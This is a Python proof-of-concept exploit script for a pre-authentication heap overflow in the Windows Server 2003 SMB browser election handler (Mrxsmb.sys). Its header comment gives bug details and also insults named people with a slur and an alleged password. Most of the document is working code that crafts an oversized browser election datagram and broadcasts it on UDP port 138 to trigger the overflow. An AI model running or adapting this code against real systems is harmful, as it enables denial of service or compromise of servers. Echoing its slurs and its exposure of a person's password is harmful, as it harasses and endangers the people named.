#################################################################################### #MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow #Release date: 2011-02-14 #Anonymous Comment: Apologies if this puts a downer on the MSRC valentines day sausage fest #Author: Cupidon-3005 #Greet: Winny Thomas, Laurent Gaffie, h07 #Bug: Heap Overflow #Remote Exploitability: Unlikely #Local Exploitability: Likely #Context: Broadcast, Pre-Auth #Special Valentines Greetings: Ruben Santamarta, is your password still "hijodeputa"? You look even more like a dumb fuck than you used to. #From dailydave: [ https://lists.immunityinc.com/pipermail/dailydave/20110121/000057.html], So your 31337 con is the only place to get 0day? Here's some pre-auth / #broadcast 0day free for all on FD with 0% conference whoring, and punks are welcome as well. ##################################################################################### #Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from ESI to EDI ... #Code will look something like this: #if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len = TotalSize/sizeof(WCHAR) - 1; } #-1 causes Len to go 0xFFFFFFFF #Feel free to reuse this code without restrictions and ask Kingcope-Fag to perform his FTP FU on SMB, he might have more luck than MS. " import socket,sys,struct from socket import * if len(sys.argv)<=4: sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah AD-NETBIOS-NAME""") ourip = sys.argv[1] host = sys.argv[2] srcname = sys.argv[3].upper() dstname = sys.argv[4].upper() ELEC = "\x42\x4f\x00" WREDIR = "\x41\x41\x00" def encodename(nbt,service): final = '\x20'+''.join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) + ord('A')) for i in nbt])+((15 - len(nbt)) * str('\x43\x41'))+service return final def lengthlittle(packet,addnum): length = struct.pack("i", len(packet)+addnum)[2:4] return length def election(srcname): elec = "\x08" elec+= "\x09" #Be the boss or die elec+= "\xa8\x0f\x01\x20" #Be the boss or die elec+= "\x1b\xe9\xa5\x00" #Up time elec+= "\x00\x00\x00\x00" #Null, like SDLC elec+= srcname+"\x00" return elec def smbheaderudp(op="\x25"): smbheader= "\xff\x53\x4d\x42" smbheader+= op smbheader+= "\x00" smbheader+= "\x00" smbheader+= "\x00\x00" smbheader+= "\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" smbheader+= "\x00\x00" return smbheader def trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\MAILSLOT\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""): packetbrowser = pbrowser packetmailslot = "\x01\x00" packetmailslot+= "\x00\x00" packetmailslot+= "\x02\x00" packetmailslot+= lengthlittle(packetbrowser+namepipe,4) packetmailslot+= namepipe +"\x00" packetdatagram = "\x11" packetdatagram+= "\x02" packetdatagram+= tid packetdatagram+= inet_aton(ip) packetdatagram+= "\x00\x8a" packetdatagram+= "\x00\xa7" packetdatagram+= "\x00\x00" packetdatagramname = encodename(sname,srcservice) packetdatagramname+= encodename(dname,dstservice) smbheader= smbheaderudp("\x25") packetrans2 = "\x11" packetrans2+= "\x00\x00" packetrans2+= lengthlittle(packetbrowser,0) packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00" packetrans2+= "\x00" packetrans2+= "\x00\x00" packetrans2+= "\xe8\x03\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= "\x00\x00" packetrans2+= lengthlittle(packetbrowser,0) packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4) packetrans2+= "\x03" packetrans2+= "\x00" andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2) lengthcalc = packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser packetfinal = packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser packetotalength = list(packetfinal) packetotalength[10:12] = lengthbig(lengthcalc,0) packetrans2final = ''.join(packetotalength) return packetrans2final def sockbroad(host,sourceservice,destservice,packet): s = socket(AF_INET,SOCK_DGRAM) s.setsockopt(SOL_SOCKET, SO_BROADCAST,1) s.bind(('0.0.0.0', 138)) try: packsmbheader = smbheaderudp("\x25") buffer0 = trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\MAILSLOT\BROWSER",srcservice=sourceservice, dstservice=destservice, pbrowser=packet) s.sendto(buffer0,(host,138)) except: print "expected SDL error:", sys.exc_info()[0] raise sockbroad(host,WREDIR,ELEC,election("A" * 410)) # -> Zing it! (between ~60->410) print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time ago...."